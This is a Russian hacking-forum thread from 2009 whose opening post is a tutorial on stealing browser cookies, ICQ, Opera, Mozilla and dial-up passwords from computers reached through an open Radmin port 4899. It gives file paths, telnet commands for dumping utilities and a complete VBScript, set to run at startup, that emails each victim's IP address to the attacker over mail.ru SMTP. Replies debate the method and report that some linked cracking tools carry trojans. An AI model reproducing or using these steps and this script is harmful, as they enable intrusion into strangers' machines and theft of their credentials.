Статьи Скрыто тырим пароли от Opera , Mozilla , icq6.5 и пароль от инета [через 4899 порт]

Discussion in 'Статьи' started by hack-win32, 15 Nov 2009.

  1. hack-win32

    hack-win32 Member

    Joined:
    11 Oct 2009
    Messages:
    31
    Likes Received:
    37
    Reputations:
    1
    Cейчас я покажу как стырить пароли от Opera , IE , Mozilla , ICQ и пароли от инета .
    Через 4899 порт . Как всегда сканим диапазон на открытый порт . Нам нужно передать файлы и воспользоватся telnet'ом .
    Cookies от IE находятся в C:\Documents and Settings\[Имя_Юзера]\Cookies - копируем всё на комп . Здесь все кукисы берем те которые нам нужны .
    Их много берём что то типо user@mail[1].txt здесь будут куки от mail.ru . Ну здесь куки от всех сайтов .
    Пароль от Icq в C:\Documents and Settings\[Имя_Юзера]\Application Data\ICQ\[uin_юзера]\Owner.mdb .
    Пароли от Opera'ы в C:\Documents and Settings\[Имя_Юзера]\Application Data\Opera\Opera\profile\wand.dat
    Теперь стырим Cookies от Mozill'ы вспомошью проги Mozilla Cookies View . Кидаем прогу на диск "С". И пишем в Telnet .
    Code:
    cd\
    mzcv.exe /stext pass_mozilla.txt - (mzcv название проги вкратце) ну и всё на диске появится pass_mozilla.txt там будут куки от Мозилы. напишем ламреру сообщение .
    И пасы от инета стырим прогой Dialupass , также кидаем на диск "С" и пишем в Telnet.
    Code:
    cd\
    x.exe /stext pass_inet.txt
    Теперь надо всё расшифровать . Для этого нужны проги Unwand -(расшифровывает пароли в Oper'е) и ICQ6 hash recover -(расшифровывает пароль от icq6)
    Куки могут неподойти так как они долго нежевут , а расшифровать пас от ICQ легко .
    Указываем путь к Owner.mdb bи получаем md5 хеш , расшифровываем его и всё .
    Теперь покажу для текех у кого ip динамический , как сделать чтобы ip приходил при включении компа . Просто помешаем mail.vbs в автозагрузку и всё .
    Ну вот и всё каждый раз при включении ипы будет приходить на мыло .
    Тело mail.vbs :
    Code:
    Set WshShell = CreateObject("WScript.Shell") 
    WshShell.Run "cmd.exe /c ipconfig > C:\WINDOWS\ip.txt", 0, false 
    
    WScript.Sleep (5000)
    
    Set S = CreateObject("Wscript.Shell")
    set FSO=createobject("scripting.filesystemobject")
    Call SendPost("smtp.mail.ru","[COLOR="Red"]куда_придёт ипы[/COLOR]@mail.ru","[COLOR="Red"]левое мыло[/COLOR]@mail.ru","IP ЛАМЕРА","hacked by hack-win32")
    Function SendPost(strSMTP_Server,strTo,strFrom,strSubject,strBody)
    Set iMsg=CreateObject("CDO.Message")
    Set iConf=CreateObject("CDO.Configuration")
    Set Flds=iConf.Fields
    Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing")=2
    Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate")=1
    Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername")="[COLOR="Red"]логин левого мыла без"@mail.ru[/COLOR]""
    Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword")="[COLOR="Red"]пас левого мыла[/COLOR]"
    Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver")="smtp.mail.ru"
    Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport")=25
    Flds.Update
    iMsg.Configuration=iConf
    iMsg.To=strTo
    iMsg.From=strFrom
    iMsg.Subject=strSubject
    iMsg.TextBody=strBody
    iMsg.AddAttachment "C:\WINDOWS\ip.txt"
    iMsg.Send
    End Function
    Set iMsg=Nothing
    Set iConf=Nothing
    Set Flds=Nothing
    Code:
    ICQ6 hash recover
    Unwand
    [URL="http://multi-up.com/170220"][B][COLOR="Lime"]Скачать[/COLOR][/B][/URL]
    Видео к статье --> Скачать

    (с)hack-win32 другой ник hack001
     
    5 people like this.
  2. X-RayBlade

    X-RayBlade Banned

    Joined:
    22 Feb 2009
    Messages:
    492
    Likes Received:
    1,002
    Reputations:
    271
    Не у всех винда ;)
    Но старался, это видно
     
    4 people like this.
  3. Root-access

    Root-access Elder - Старейшина

    Joined:
    18 Jun 2008
    Messages:
    193
    Likes Received:
    195
    Reputations:
    91
    Старался-то старался...
    Но вот всё палевно и неактуально.
    Пригодилось бы несколько лет назад, ещё до создания пинча.
     
  4. hack-win32

    hack-win32 Member

    Joined:
    11 Oct 2009
    Messages:
    31
    Likes Received:
    37
    Reputations:
    1
    вот чё здесь палевно ? вся работа через telnet и передачу файлов .
     
  5. Root-access

    Root-access Elder - Старейшина

    Joined:
    18 Jun 2008
    Messages:
    193
    Likes Received:
    195
    Reputations:
    91
    Беспалевно это будет только для тупого юзера, а у тупых юзеров врядли что-то ценное в пассах.

    Способ совершенно неуниверсален, фаервол будет блочить, порт может быть закрыт, к тому же хак-скрипты на vbs остались в прошлом - всё будет палиться.
     
  6. X-RayBlade

    X-RayBlade Banned

    Joined:
    22 Feb 2009
    Messages:
    492
    Likes Received:
    1,002
    Reputations:
    271
    Все начинается с самых азов. Человек проявил инициативу, а это уже хорошо :)
     
    1 person likes this.
  7. Root-access

    Root-access Elder - Старейшина

    Joined:
    18 Jun 2008
    Messages:
    193
    Likes Received:
    195
    Reputations:
    91
    Конечно, я его и не осуждаю, это хорошо, может он в итоге трой хороший напишет.
     
    1 person likes this.
  8. aqqa

    aqqa Banned

    Joined:
    12 Jul 2008
    Messages:
    96
    Likes Received:
    16
    Reputations:
    3
    Ещё круто када 25 порт закрыт,пароли хер прийдут!
     
  9. Xcontrol212

    Xcontrol212 Elder - Старейшина

    Joined:
    13 Feb 2008
    Messages:
    253
    Likes Received:
    110
    Reputations:
    7
    можно сделать так,когда например взломали чужой компьютер через метасплоит,тут то статья ТС нам и пригодиться и способ достаточно актуален

    а разве порт сменить нельзя?))

    я уверен на 99%,что ты не заметишь,как тебя хекнут и получать доступ к твоей командной строке через свежий сплоит под висту например)
     
    1 person likes this.
  10. aqqa

    aqqa Banned

    Joined:
    12 Jul 2008
    Messages:
    96
    Likes Received:
    16
    Reputations:
    3
    Вобщето smtp на мэйле работает по 25 порту, и по 2525 кажется.....Если они закрыты *** получится
    и потом если метасплойтом получить доступ к командной строке то нахуя гародить какие-то скрипты, когда можо напрямую к файлам добраться?
     
  11. Xcontrol212

    Xcontrol212 Elder - Старейшина

    Joined:
    13 Feb 2008
    Messages:
    253
    Likes Received:
    110
    Reputations:
    7
    знаю,что SMTP работает на 25,ну я имел виду,что напрмиер у Радмина можно поменять порт с 4899 на любой из существующих портов)
    и радмином можно получить доступ;)
    ТС делает же все через радмин;)
     
  12. aqqa

    aqqa Banned

    Joined:
    12 Jul 2008
    Messages:
    96
    Likes Received:
    16
    Reputations:
    3
    чет я про радмин не заметил,я тока код глянул...
    Ну тогда ваще непонимаю зачем скрипт было писать...
     
  13. Root-access

    Root-access Elder - Старейшина

    Joined:
    18 Jun 2008
    Messages:
    193
    Likes Received:
    195
    Reputations:
    91

    Дан, ты не в теме, он через telnet делает.
     
  14. hack-win32

    hack-win32 Member

    Joined:
    11 Oct 2009
    Messages:
    31
    Likes Received:
    37
    Reputations:
    1
    какие скрипты ? там только один скрипт для оправки ипы на мыло при включении компа
     
    1 person likes this.
  15. Xcontrol212

    Xcontrol212 Elder - Старейшина

    Joined:
    13 Feb 2008
    Messages:
    253
    Likes Received:
    110
    Reputations:
    7
    читай название темы:Скрыто тырим пароли от Opera , Mozilla , icq6.5 и пароль от инета [через 4899 порт]
    Данный порт использует программа Radmin и там встроенный telnet и передача файлов:)
     
    1 person likes this.
  16. aqqa

    aqqa Banned

    Joined:
    12 Jul 2008
    Messages:
    96
    Likes Received:
    16
    Reputations:
    3
    он самый
     
  17. NeoX

    NeoX Elder - Старейшина

    Joined:
    23 Aug 2008
    Messages:
    65
    Likes Received:
    21
    Reputations:
    5
    в прогах трой! =\

    Neshta, переделывает ехешник что незя прогу запустить какую либо.
     
  18. sTe[A]LeR

    sTe[A]LeR Member

    Joined:
    10 Sep 2009
    Messages:
    17
    Likes Received:
    12
    Reputations:
    5
    норм тока 1 прога, которая расшифровывает пассы от оперы, а прога для аськи трой
     
  19. NeoX

    NeoX Elder - Старейшина

    Joined:
    23 Aug 2008
    Messages:
    65
    Likes Received:
    21
    Reputations:
    5
    угу, а я открыл его + антивир отрубил =\\ повезло фаервол закричал, все исправил.
     
  20. ixtor1

    ixtor1 Active Member

    Joined:
    25 Oct 2009
    Messages:
    108
    Likes Received:
    122
    Reputations:
    -7
    тс,извини а статейка то раньше вроде на другом ресурсе появилась тут